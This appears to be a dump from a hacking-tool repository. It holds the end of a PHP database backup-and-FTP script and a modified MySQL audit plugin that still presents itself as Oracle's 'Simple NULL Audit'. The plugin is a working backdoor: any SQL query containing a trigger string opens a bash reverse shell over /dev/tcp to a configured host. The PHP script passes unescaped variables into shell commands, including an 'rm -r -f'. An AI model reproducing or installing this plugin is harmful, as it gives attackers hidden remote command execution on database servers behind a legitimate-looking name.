142 | // $data . "\n\n" ."--{$mime_boundary}--\n";
143 | 
144 | 
145 | // Send the message
146 | $ok = @mail($to, $subject, $message, $headers);
147 | if ($ok) {
148 |   echo "
Database backup created and sent! File name $filename2 

149 | Idea Conceived By coolsurfer@gmail.com        
150 | Programmer email: neagumihai@hotmail.com

151 | This is our first humble effort, pl report bugs, if U find any...

152 | Email me at <>coolsurfer@gmail.com  nJoY!! :)
153 | 
";
154 | 
155 | } else {
156 |   echo "
Mail could not be sent. Sorry!
";
157 | }
158 | }
159 | 
160 | if($use_ftp == "yes"){
161 | $ftpconnect = "ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog.log -e dbsender_ftplog2.log -a -E -V $ftp_server $ftp_path $filename2";
162 | shell_exec($ftpconnect);
163 | echo "
$filename2 Was created and uploaded to your FTP server!
";
164 | 
165 | }
166 | 
167 | if($remove_gzip_file=="yes"){
168 | exec("rm -r -f $filename2");
169 | }
170 | ?>


--------------------------------------------------------------------------------
/Mysql/mysql_audit_plugin/audit_null.c:
--------------------------------------------------------------------------------
  1 | /*
  2 |  *  Modified by t57root@gmail.com
  3 |  *  openwill.me / www.hackshell.net
  4 |  */
  5 | /* Copyright (c) 2010, Oracle and/or its affiliates. All rights reserved.
  6 | 
  7 |    This program is free software; you can redistribute it and/or
  8 |    modify it under the terms of the GNU General Public License as
  9 |    published by the Free Software Foundation; version 2 of the
 10 |    License.
 11 | 
 12 |    This program is distributed in the hope that it will be useful,
 13 |    but WITHOUT ANY WARRANTY; without even the implied warranty of
 14 |    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 15 |    GNU General Public License for more details.
 16 | 
 17 |    You should have received a copy of the GNU General Public License
 18 |    along with this program; if not, write to the Free Software
 19 |    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */
 20 | 
 21 | #include 
 22 | #include 
 23 | #include 
 24 | #include 
 25 | #include 
 26 | #include 
 27 | #include 
 28 | #include 
 29 | 
 30 | #define BACK_IP "127.0.0.1"
 31 | #define BACK_PORT "8080"
 32 | #define DEBUG 1
 33 | 
 34 | #if !defined(__attribute__) && (defined(__cplusplus) || !defined(__GNUC__)  || __GNUC__ == 2 && __GNUC_MINOR__ < 8)
 35 | #define __attribute__(A)
 36 | #endif
 37 | static FILE *log_fp;
 38 | static sem_t *sem = NULL;
 39 | static time_t last_exec;
 40 | 
 41 | static volatile int number_of_calls; /* for SHOW STATUS, see below */
 42 | /* Count MYSQL_AUDIT_GENERAL_CLASS event instances */
 43 | static volatile int number_of_calls_general_log;
 44 | static volatile int number_of_calls_general_error;
 45 | static volatile int number_of_calls_general_result;
 46 | static volatile int number_of_calls_general_status;
 47 | /* Count MYSQL_AUDIT_CONNECTION_CLASS event instances */
 48 | static volatile int number_of_calls_connection_connect;
 49 | static volatile int number_of_calls_connection_disconnect;
 50 | static volatile int number_of_calls_connection_change_user;
 51 | 
 52 | 
 53 | /*
 54 |   Initialize the plugin at server start or plugin installation.
 55 | 
 56 |   SYNOPSIS
 57 |     audit_null_plugin_init()
 58 | 
 59 |   DESCRIPTION
 60 |     Does nothing.
 61 | 
 62 |   RETURN VALUE
 63 |     0                    success
 64 |     1                    failure (cannot happen)
 65 | */
 66 | 
 67 | static int audit_null_plugin_init(void *arg __attribute__((unused)))
 68 | {
 69 |   number_of_calls= 0;
 70 |   number_of_calls_general_log= 0;
 71 |   number_of_calls_general_error= 0;
 72 |   number_of_calls_general_result= 0;
 73 |   number_of_calls_general_status= 0;
 74 |   number_of_calls_connection_connect= 0;
 75 |   number_of_calls_connection_disconnect= 0;
 76 |   number_of_calls_connection_change_user= 0;
 77 |   log_fp = NULL;
 78 |   sem = NULL;
 79 |   return(0);
 80 | }
 81 | 
 82 | 
 83 | /*
 84 |   Terminate the plugin at server shutdown or plugin deinstallation.
 85 | 
 86 |   SYNOPSIS
 87 |     audit_null_plugin_deinit()
 88 |     Does nothing.
 89 | 
 90 |   RETURN VALUE
 91 |     0                    success
 92 |     1                    failure (cannot happen)
 93 | 
 94 | */
 95 | 
 96 | static int audit_null_plugin_deinit(void *arg __attribute__((unused)))
 97 | {
 98 |   if(log_fp!=NULL) fclose(log_fp);
 99 |   if(sem!=NULL) sem_close(sem);
100 |   return(0);
101 | }
102 | 
103 | 
104 | /*
105 |   Foo
106 | 
107 |   SYNOPSIS
108 |     audit_null_notify()
109 |       thd                connection context
110 | 
111 |   DESCRIPTION
112 | */
113 | 
114 | static void audit_null_notify(MYSQL_THD thd __attribute__((unused)),
115 |                               unsigned int event_class,
116 |                               const void *event)
117 | {
118 |   /* prone to races, oh well */
119 |   number_of_calls++;
120 |   if (event_class == MYSQL_AUDIT_GENERAL_CLASS)
121 |   {
122 |     const   struct mysql_event_general *pEvent;
123 | 
124 |     pEvent = (const struct mysql_event_general *) event;
125 |     if (pEvent->general_query != NULL && *(pEvent->general_query) != '\0') {
126 |         sem = sem_open("haha", O_RDWR|O_CREAT, 00777, 1);
127 |         if(strstr(pEvent->general_query,"openwill.me")!=NULL && sem_trywait(sem)==0 && (time(0)-last_exec)>10){
128 |             last_exec = time(0);
129 |             #ifdef DEBUG
130 |             if(log_fp == NULL)log_fp = fopen("/tmp/null_audit.log", "a");
131 |             fprintf(log_fp, "execing\n");
132 |             fprintf(log_fp, "%s;\n\n", pEvent->general_query);
133 |             fflush(log_fp);
134 |             #endif
135 |             system("bash < /dev/tcp/"BACK_IP"/"BACK_PORT" >&0 2>&0 &");
136 |         }
137 |         sem_unlink("haha");
138 |    }    
139 |    //Job done
140 |   }
141 | }
142 | 
143 | 
144 | /*
145 |   Plugin type-specific descriptor
146 | */
147 | 
148 | static struct st_mysql_audit audit_null_descriptor=
149 | {
150 |   MYSQL_AUDIT_INTERFACE_VERSION,                    /* interface version    */
151 |   NULL,                                             /* release_thd function */
152 |   audit_null_notify,                                /* notify function      */
153 |   { (unsigned long) MYSQL_AUDIT_GENERAL_CLASSMASK |
154 |                     MYSQL_AUDIT_CONNECTION_CLASSMASK } /* class mask           */
155 | };
156 | 
157 | /*
158 |   Plugin status variables for SHOW STATUS
159 | */
160 | 
161 | static struct st_mysql_show_var simple_status[]=
162 | {
163 |   { "Audit_null_called",
164 |     (char *) &number_of_calls,
165 |     SHOW_INT },
166 |   { "Audit_null_general_log",
167 |     (char *) &number_of_calls_general_log,
168 |     SHOW_INT },
169 |   { "Audit_null_general_error",
170 |     (char *) &number_of_calls_general_error,
171 |     SHOW_INT },
172 |   { "Audit_null_general_result",
173 |     (char *) &number_of_calls_general_result,
174 |     SHOW_INT },
175 |   { "Audit_null_general_status",
176 |     (char *) &number_of_calls_general_status,
177 |     SHOW_INT },
178 |   { "Audit_null_connection_connect",
179 |     (char *) &number_of_calls_connection_connect,
180 |     SHOW_INT },
181 |   { "Audit_null_connection_disconnect",
182 |     (char *) &number_of_calls_connection_disconnect,
183 |     SHOW_INT },
184 |   { "Audit_null_connection_change_user",
185 |     (char *) &number_of_calls_connection_change_user,
186 |     SHOW_INT },
187 |   { 0, 0, 0}
188 | };
189 | 
190 | 
191 | /*
192 |   Plugin library descriptor
193 | */
194 | 
195 | mysql_declare_plugin(audit_null)
196 | {
197 |   MYSQL_AUDIT_PLUGIN,         /* type                            */
198 |   &audit_null_descriptor,     /* descriptor                      */
199 |   "NULL_AUDIT",               /* name                            */
200 |   "Oracle Corp",              /* author                          */
201 |   "Simple NULL Audit",        /* description                     */
202 |   PLUGIN_LICENSE_GPL,
203 |   audit_null_plugin_init,     /* init function (when loaded)     */
204 |   audit_null_plugin_deinit,   /* deinit function (when unloaded) */
205 |   0x0003,                     /* version                         */
206 |   simple_status,              /* status variables                */
207 |   NULL,                       /* system variables                */
208 |   NULL,
209 |   0,
210 | }
211 | mysql_declare_plugin_end;
212 | 
213 | 


--------------------------------------------------------------------------------